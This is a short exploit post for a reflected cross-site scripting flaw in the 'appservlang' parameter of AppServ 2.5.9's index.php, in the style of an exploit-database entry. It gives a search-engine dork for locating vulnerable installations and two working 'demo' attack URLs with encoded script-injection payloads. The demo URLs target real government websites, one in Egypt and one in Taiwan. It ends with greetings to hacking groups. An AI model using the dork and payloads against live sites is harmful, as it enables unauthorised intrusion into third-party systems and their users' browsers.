AppServ 2.5.9 Cross Site Scripting

1. AppServ 2.5.9 Cross Site Scripting
2. HOMe : http://www.appservnetwork.com
3. Author : sH@rk-Dz
4. FB : ****/hasni.dzshark
5. Date: 28/05/2014
6. D0rk : intitle:"AppServ Open Project" -site:www.appservnetwork.com
7. Vulnerable File : /index.php
8. Exploit : http://localhost.com/index.php?appservlang=
9. Demo1:http://testbank.moe.gov.eg/index.php?appservlang=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
10. Demo2:http://www.fcea.gov.tw/index.php?appservlang=%22/%3E%3Cscript%3Ealert%28String.fromCharCode%2888,%20115,%20115,%2045,%2066,%20121,%2058,%2045,%20115,%2072,%2064,%20114,%20107,%2045,%2068,%20122%29%29;%3C/script%3E
11. ====================================================================================
12. Small Info About The Vuln:
13. In The Name Of Allah ^_^
14. The Vuln Found in the file ==> index.php
15. index.php at the paramter ?appservlang=
16. we can also inject any code of xss and send by GET in live http-Headers
17. and also we can iject string not only number using Charcode (in hackbar ther's small addon)
18.  
19. note:type of the vul is reflected :)
20.  
21. Greet's To : All ALG & ARB E-Hackers || exploit4arab.net || S3k-k.com || Aljyyosh.com || V4-team.com || Welad Cha3b Dz:)